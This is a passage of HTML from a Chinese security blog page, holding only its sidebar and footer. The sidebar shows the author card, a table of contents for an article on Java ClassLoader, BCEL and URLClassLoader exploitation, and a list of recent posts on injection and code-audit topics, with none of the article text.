alt="avatar"/></div><div class="author-info__name">Zeo</div><div class="author-info__description">专注于安全,分享生活,分享知识</div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">125</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">46</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">9</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/godzeo"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/godzeo" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="mailto:zzzhhhaaaiiii@gmail.com" target="_blank" title="Email"><i class="fas fa-envelope"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">Weclome my blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x00-%E5%89%8D%E6%8F%90"><span class="toc-number">1.</span> <span class="toc-text">0x00 前提</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01-Java%E7%B1%BB%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8"><span class="toc-number">2.</span> <span class="toc-text">0x01 Java类基本使用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ClassLoader"><span class="toc-number">2.1.</span> <span class="toc-text">ClassLoader</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ClassLoader%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%B5%81%E7%A8%8B"><span class="toc-number">2.2.</span> <span class="toc-text">ClassLoader类加载流程</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02-%E8%87%AA%E5%AE%9A%E4%B9%89ClassLoader"><span class="toc-number">3.</span> <span class="toc-text">0x02 自定义ClassLoader</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%87%AA%E5%AE%9A%E4%B9%89ClassLoader"><span class="toc-number">3.1.</span> <span class="toc-text">自定义ClassLoader</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03-BCEL"><span class="toc-number">4.</span> <span class="toc-text">0x03 BCEL</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#BCEL-ClassLoader"><span class="toc-number">4.1.</span> <span class="toc-text">BCEL ClassLoader</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#BCEL%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86"><span class="toc-number">4.1.1.</span> <span class="toc-text">BCEL攻击原理</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#BCEL%E7%89%88%E6%9C%AC"><span class="toc-number">4.2.</span> <span class="toc-text">BCEL版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E7%A4%BA%E4%BE%8B"><span class="toc-number">4.3.</span> <span class="toc-text">利用示例</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x04-BCEL-Fastjson-%E5%BA%94%E7%94%A8"><span class="toc-number">5.</span> <span class="toc-text">0x04 BCEL Fastjson 应用</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x05-URLclassloader"><span class="toc-number">6.</span> <span class="toc-text">0x05 URLclassloader</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#URLClassLoader"><span class="toc-number">6.1.</span> <span class="toc-text">URLClassLoader</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E7%A4%BA%E4%BE%8B%EF%BC%9A"><span class="toc-number">6.2.</span> <span class="toc-text">利用示例：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x06-%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83"><span class="toc-number">7.</span> <span class="toc-text">0x06 实验环境</span></a></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2022/11/28/Nosql%20inject%E6%B3%A8%E5%85%A5/" title="Nosql inject注入"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231217732.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Nosql inject注入"/></a><div class="content"><a class="title" href="/2022/11/28/Nosql%20inject%E6%B3%A8%E5%85%A5/" title="Nosql inject注入">Nosql inject注入</a><time datetime="2022-11-28T07:28:02.000Z" title="发表于 2022-11-28 15:28:02">2022-11-28</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/11/15/%E4%BC%81%E4%B8%9A%20SDLC%20%E5%AE%89%E5%85%A8%E7%94%9F%E5%91%BD%E5%91%A8%E6%9C%9F%E7%AE%A1%E7%90%86/" title="企业 SDLC 安全生命周期管理"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231217732.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="企业 SDLC 安全生命周期管理"/></a><div class="content"><a class="title" href="/2022/11/15/%E4%BC%81%E4%B8%9A%20SDLC%20%E5%AE%89%E5%85%A8%E7%94%9F%E5%91%BD%E5%91%A8%E6%9C%9F%E7%AE%A1%E7%90%86/" title="企业 SDLC 安全生命周期管理">企业 SDLC 安全生命周期管理</a><time datetime="2022-11-15T14:03:44.000Z" title="发表于 2022-11-15 22:03:44">2022-11-15</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/11/05/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E6%BC%8F%E6%B4%9E(File%20Operation!Redirect!Cors)/" title="Go 代码审计漏洞(File Operation\Redirect\Cors)"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Go 代码审计漏洞(File Operation\Redirect\Cors)"/></a><div class="content"><a class="title" href="/2022/11/05/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E6%BC%8F%E6%B4%9E(File%20Operation!Redirect!Cors)/" title="Go 代码审计漏洞(File Operation\Redirect\Cors)">Go 代码审计漏洞(File Operation\Redirect\Cors)</a><time datetime="2022-11-05T09:15:28.000Z" title="发表于 2022-11-05 17:15:28">2022-11-05</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/10/30/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E9%AB%98%E5%8D%B1%E6%BC%8F%E6%B4%9E(sqli!cmd!ssrf)/" title="Go 代码审计高危漏洞(sqli\cmd\ssrf)"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Go 代码审计高危漏洞(sqli\cmd\ssrf)"/></a><div class="content"><a class="title" href="/2022/10/30/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E9%AB%98%E5%8D%B1%E6%BC%8F%E6%B4%9E(sqli!cmd!ssrf)/" title="Go 代码审计高危漏洞(sqli\cmd\ssrf)">Go 代码审计高危漏洞(sqli\cmd\ssrf)</a><time datetime="2022-10-30T06:57:14.000Z" title="发表于 2022-10-30 14:57:14">2022-10-30</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/05/10/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%9A%20ClassLoader%E5%BA%94%E7%94%A8/" title="Java代码审计： ClassLoader应用"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Java代码审计： ClassLoader应用"/></a><div class="content"><a class="title" href="/2022/05/10/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%9A%20ClassLoader%E5%BA%94%E7%94%A8/" title="Java代码审计： ClassLoader应用">Java代码审计： ClassLoader应用</a><time datetime="2022-05-10T08:21:21.000Z" title="发表于 2022-05-10 16:21:21">2022-05-10</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2019 - 2022 By Zeo</div><div class="footer_custom_text">Hi, welcome to my blog!</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><div class="js-pjax"></div></div></body></html>